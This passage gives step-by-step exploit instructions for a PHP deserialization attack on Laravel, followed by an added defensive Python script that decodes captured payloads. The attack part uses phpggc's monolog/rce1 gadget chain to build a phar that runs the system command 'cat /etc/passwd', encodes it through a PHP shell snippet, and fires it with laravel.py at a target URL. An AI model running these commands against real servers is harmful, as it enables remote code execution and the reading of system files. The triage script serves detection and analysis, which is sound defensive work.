Generate a phar archive carrying a custom command:
php -d'phar.readonly=0' ./phpggc monolog/rce1 system "cat /etc/passwd" --phar phar -o php://output | base64 -w0
php -a  # enter the PHP interactive shell
$fp = fopen('php://output', 'w');
stream_filter_append($fp, 'convert.quoted-printable-encode');
$size = "";
fwrite($fp, iconv('utf-8','utf-16le',$size));
Save the generated payload to a file, then pass it to the script:
python laravel.py --url "http(s)://192.168.0.109:8000/" --phar test.phar
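For triage of a captured blob, the encoding chain in the PHP snippet above (UTF-16LE, then quoted-printable) can be reversed and the result checked for the phar stub marker. This is an added example, not code from the original page or from phpggc or laravel.py; it assumes the inner layer is the base64 text produced by the first command, and the names decode_chain, triage and make_sample are hypothetical.

```python
import base64
import hashlib
import quopri

# Every phar archive carries this token at the end of its PHP stub.
PHAR_STUB_MARKER = b"__HALT_COMPILER();"


def decode_chain(blob: bytes) -> bytes:
    """Undo quoted-printable, then UTF-16LE, then base64 (assumed inner layer)."""
    utf16 = quopri.decodestring(blob)
    text = utf16.decode("utf-16le")          # raises on odd-length input
    return base64.b64decode(text, validate=True)


def triage(blob: bytes) -> dict:
    """Classify a captured blob without executing or unserializing anything."""
    try:
        raw = decode_chain(blob)
    except ValueError as exc:                # covers base64 and UTF-16 errors
        return {"decoded": False, "reason": type(exc).__name__}
    return {
        "decoded": True,
        "size": len(raw),
        "phar_stub": PHAR_STUB_MARKER in raw,
        "sha256": hashlib.sha256(raw).hexdigest(),
    }


def make_sample(raw: bytes) -> bytes:
    """Constructed test input: base64 text as UTF-16LE, quoted-printable encoded."""
    b64 = base64.b64encode(raw).decode("ascii")
    # Each ASCII char is followed by a NUL (=00); a literal '=' becomes =3D.
    return "".join(("=3D" if ch == "=" else ch) + "=00" for ch in b64).encode("ascii")


if __name__ == "__main__":
    # Constructed, inert bytes: a stub marker plus filler, not a real archive.
    sample = make_sample(b"<?php __HALT_COMPILER(); ?>\r\nconstructed-filler")
    print(triage(sample))
    print(triage(b"ordinary log text"))
```

The sha256 field lets the decoded bytes be matched against other captures without storing the bytes themselves.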